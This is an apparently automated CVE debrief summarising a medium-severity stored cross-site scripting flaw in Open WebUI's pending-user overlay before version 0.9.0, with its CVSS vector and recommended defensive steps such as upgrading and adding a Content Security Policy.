PatchSiren cyber security CVE debrief
CVE-2026-44568 open-webui CVE debrief
A stored cross-site scripting (XSS) vulnerability exists in Open WebUI prior to version 0.9.0. The AccountPending.svelte component renders administrator-configured
- Vendor
- open-webui
- Product
- Unknown
- CVSS
- MEDIUM 4.8
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-05-15
- Original CVE updated
- 2026-05-19
- Advisory published
- 2026-05-15
- Advisory updated
- 2026-05-19
Who should care
Organizations running self-hosted Open WebUI instances with pending user workflows; security teams monitoring for stored XSS in AI platform interfaces; administrators responsible for Open WebUI deployments
Technical summary
Open WebUI versions prior to 0.9.0 contain a stored cross-site scripting vulnerability in the AccountPending.svelte component. The component renders administrator-configured Pending User Overlay Content using marked.parse() inside Svelte's {@html} directive with incorrect DOMPurify application ordering. This flaw allows administrators with high privileges to inject arbitrary JavaScript that executes in the browser context of pending users viewing the overlay page. The vulnerability requires high privileges (administrator access) to exploit and user interaction from pending users to trigger. Scope is changed due to the JavaScript executing in a different security context than the vulnerable component. The issue is resolved in Open WebUI version 0.9.0.
Defensive priority
medium
Recommended defensive actions
- Upgrade Open WebUI to version 0.9.0 or later to remediate this vulnerability
- Review and sanitize any existing Pending User Overlay Content configured by administrators
- Audit administrator accounts for potential compromise if untrusted content was previously configured
- Implement Content Security Policy (CSP) headers as a defense-in-depth measure for the Open WebUI deployment
- Monitor for suspicious JavaScript execution in browser contexts of pending user accounts
Evidence notes
The vulnerability stems from improper sanitization order when processing the Pending User Overlay Content. The marked.parse() function is used with {@html} in Svelte, but DOMPurify is not applied correctly, allowing JavaScript injection. The CVSS 3.1 vector CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N indicates network attack vector, low attack complexity, high privileges required, user interaction required, changed scope, with low confidentiality and integrity impact. CWE-79 (Improper Neutralization of Input During Web Page Generation) is identified as the weakness type.
Official resources
-
CVE-2026-44568 CVE record
CVE.org
-
CVE-2026-44568 NVD detail
NVD
-
Source item URL
nvd_modified
-
Mitigation or vendor reference
[email protected] - Exploit, Mitigation, Vendor Advisory
2026-05-15